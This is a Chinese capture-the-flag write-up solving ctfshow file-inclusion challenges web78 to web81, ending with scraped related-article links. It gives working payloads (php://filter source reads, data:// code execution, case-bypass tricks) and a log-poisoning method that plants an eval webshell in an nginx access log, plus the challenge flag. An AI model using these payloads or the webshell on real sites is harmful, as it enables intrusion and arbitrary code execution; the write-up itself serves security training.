ctfshow文件包含web78~81

目录

web78

方法一:filter伪协议

方法二:input协议

方法三:data协议

web79

方法一:input协议

方法二:data协议

web80

方法一:input协议

方法二:日志包含getshell

web81


web78

php 复制代码
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

include函数执行file引入的文件,如果执行不成功,就高亮显示当前页面的源码。

可知这就是一个没有任何过滤的文件包含的题目。

方法一:filter伪协议

file关键字的get参数传递,php://是一种协议名称,php://filter/是一种访问本地文件的协议,/read=convert.base64-encode/表示读取的方式是base64编码后,resource=index.php表示目标文件为index.php。

filter伪协议构造payload

php 复制代码
?file=php://filter/read=convert.base64-encode/resource=flag.php

得到base编码后的flag解密得到flag

方法二:input协议

php://input 是 PHP 提供的一个伪协议,允许开发者 访问 POST 请求的原始内容。对于 POST 请求数据,PHP 提供了 _POST 与 FILES 超全局变量,在客户端发起 POST 请求时,PHP 将自动处理 POST 提交的数据并将处理结果存放至 _POST 与 FILES 中。

方法三:data协议

data也是利用文件包含漏洞,将输入的代码当作php文件执行。

data协议格式:

php 复制代码
data://[<MIME-type>][;charset=<encoding>][;base64],<data>

构造payload:

php 复制代码
?file=data://text/plain,<?php system('tac f*');?>

将我们输入的<?php system('tac f*');?>当作php文件来执行,以达到读取flag的目的。

web79

php 复制代码
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

可以看到在上一道题的基础上,增加了对php字符串的过滤,但是值得注意的是,过滤是区分了大小写的,这就意味着,可以使用大小写绕过,但是这里的大小写绕过对input和data协议有用,对filter协议没有用。

方法一:input协议

将php改为Php

方法二:data协议

php 复制代码
?file=data://text/plain,<?Php system('tac f*');?>

这里要将php改为大写的,但是上面的input协议就不用,这是因为我们的参数file是通过get方式传参的,str_replace函数检查也只是检查get方式传入的值,input协议中的php是通过post方式传参的,因此不用改,data协议的php是get方式传入的,于是需要大小写绕过。

web80

php 复制代码
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

新增了对data的过滤,对data尝试了大小写绕过,发现绕过不了,于是data协议用不了,就只能用input协议了。

方法一:input协议

方法二:日志包含getshell

在了解过后,发现这道题还可以通过日志包含getshell的方法来做。

日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。

首先要判断网站使用的什么服务:

对于Apache,日志存放路径:/var/log/apache/access.log
对于Ngnix,日志存放路径:/var/log/nginx/access.log 和 /var/log/nginx/error.log

查看web服务:

于是我们访问日志:

php 复制代码
?file=/var/log/nginx/access.log 

在user-agent添加木马

php 复制代码
<?php @eval($_REQUEST['cmd']);?>

post传参,首先查看列表

php 复制代码
cmd=system('ls');

可以看到目录下面有flag,直接cat查看

php 复制代码
cmd=system('tac f*');

得到flag。

web81

php 复制代码
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了冒号,伪协议不好用了,于是,这个题还是用web80的getshell方法,得到flag

php 复制代码
ctfshow{333cb693-64d5-4c3e-b564-6fddb4621e1e}
相关推荐
黄焖鸡能干四碗6 小时前
信息系统安全保护措施文件方案
大数据·开发语言·人工智能·web安全·制造
2301_780789668 小时前
渗透测试与网络安全审计的关系
网络·数据库·安全·web安全·网络安全
卓码软件测评11 小时前
第三方web测评机构:【WEB安全测试中HTTP方法(GET/POST/PUT)的安全风险检测】
前端·网络协议·安全·web安全·http·xss
似水流年 光阴已逝19 小时前
《网络安全实战:CC攻击(应用层)与DDoS攻击(网络层)的底层逻辑与防御体系》
安全·web安全·ddos·网络攻击·安全防护·cc攻击
网络安全大学堂21 小时前
【网络安全入门基础教程】网络安全零基础学习方向及需要掌握的技能
网络·学习·安全·web安全·网络安全·黑客
码农101号1 天前
Linux 网络安全运维与文件权限控制和日志操作
运维·web安全·云计算
安畅检测_齐鲁物联网测试中心1 天前
信息化安全性测试中漏洞扫描的定义与核心目的
安全·web安全·漏洞扫描·cma·cnas·第三方检测机构·信息安全性测试
lingggggaaaa1 天前
小迪安全v2023学习笔记(七十七讲)—— 业务设计篇&隐私合规检测&重定向漏洞&资源拒绝服务
笔记·学习·安全·web安全·网络安全
白帽黑客沐瑶2 天前
【网络安全入门基础教程】网络安全行业,未来两年就业和再就业都会很难
网络·人工智能·计算机网络·安全·web安全·网络安全就业
Suckerbin2 天前
Web安全——JWT
安全·web安全·网络安全